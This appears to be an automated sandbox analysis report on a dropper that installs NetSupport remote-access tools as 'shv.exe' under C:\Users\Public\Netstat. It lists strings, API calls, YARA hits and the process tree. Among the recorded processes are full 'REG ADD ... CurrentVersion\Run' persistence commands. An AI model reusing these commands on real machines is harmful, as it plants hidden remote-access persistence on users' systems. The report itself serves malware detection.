                                Source: shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspi
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,6_2_11032EE0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,9_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,9_2_11032EE0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,6_2_110321E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_110076F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11113880
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,9_2_11113880
                                Source: Yara matchFile source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_111158B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,9_2_111158B0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E78C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E78C2F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,6_2_1115DB40
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A1F200_2_00007FF70E7A1F20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E785E240_2_00007FF70E785E24
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7ACE880_2_00007FF70E7ACE88
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E78F9300_2_00007FF70E78F930
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7949280_2_00007FF70E794928
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B07540_2_00007FF70E7B0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79A4AC0_2_00007FF70E79A4AC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A34840_2_00007FF70E7A3484
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7AB1900_2_00007FF70E7AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79AF180_2_00007FF70E79AF18
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C20800_2_00007FF70E7C2080
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B07540_2_00007FF70E7B0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A8DF40_2_00007FF70E7A8DF4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A2D580_2_00007FF70E7A2D58
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A4B980_2_00007FF70E7A4B98
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E795B600_2_00007FF70E795B60
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79BB900_2_00007FF70E79BB90
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B8C1C0_2_00007FF70E7B8C1C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B89A00_2_00007FF70E7B89A0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A39640_2_00007FF70E7A3964
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79C96C0_2_00007FF70E79C96C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E781AA40_2_00007FF70E781AA4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A2AB00_2_00007FF70E7A2AB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C5AF80_2_00007FF70E7C5AF8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E791A480_2_00007FF70E791A48
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7BFA940_2_00007FF70E7BFA94
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7BC8380_2_00007FF70E7BC838
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7848400_2_00007FF70E784840
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79B5340_2_00007FF70E79B534
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C25500_2_00007FF70E7C2550
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7876C00_2_00007FF70E7876C0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A53F00_2_00007FF70E7A53F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A21D00_2_00007FF70E7A21D0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79F1800_2_00007FF70E79F180
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E78C2F00_2_00007FF70E78C2F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E78A3100_2_00007FF70E78A310
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79126C0_2_00007FF70E79126C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7872880_2_00007FF70E787288
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110733B06_2_110733B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110295906_2_11029590
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11061C906_2_11061C90
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110330106_2_11033010
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111632206_2_11163220
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1102B5F06_2_1102B5F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111674856_2_11167485
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110454F06_2_110454F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1101B7606_2_1101B760
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111258B06_2_111258B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1101BBA06_2_1101BBA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11087C606_2_11087C60
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1116DFCB6_2_1116DFCB
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110700906_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110804806_2_11080480
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1115E9806_2_1115E980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1101C9C06_2_1101C9C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110088AB6_2_110088AB
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11050D806_2_11050D80
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1CA9806_2_6D1CA980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1F3DB86_2_6D1F3DB8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1F49106_2_6D1F4910
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1F39236_2_6D1F3923
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11061C909_2_11061C90
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110330109_2_11033010
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110733B09_2_110733B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111632209_2_11163220
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110295909_2_11029590
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1102B5F09_2_1102B5F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111674859_2_11167485
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110454F09_2_110454F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1101B7609_2_1101B760
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111258B09_2_111258B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1101BBA09_2_1101BBA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11087C609_2_11087C60
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1116DFCB9_2_1116DFCB
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110700909_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110804809_2_11080480
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1115E9809_2_1115E980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1101C9C09_2_1101C9C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110088AB9_2_110088AB
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11050D809_2_11050D80
                                Source: C:\Users\Public\Netstat\shv.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 110B7A20 appears 43 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11146450 appears 1223 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 6D1C30A0 appears 31 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11146EC0 appears 48 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 6D1D7D00 appears 67 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 6D1C6F50 appears 72 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1116F010 appears 74 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11029450 appears 2011 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 111603E3 appears 82 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11173663 appears 40 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1105DD10 appears 585 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11081BB0 appears 85 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1105DE40 appears 54 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11164010 appears 64 times
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.2140610512.00000229E9617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: classification engineClassification label: mal96.rans.evad.winEXE@20/13@1/2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E78B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF70E78B6D8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109D440
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,6_2_1109D4D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,9_2_1109D440
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,9_2_1109D4D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,6_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF70E7A8624
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 39%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
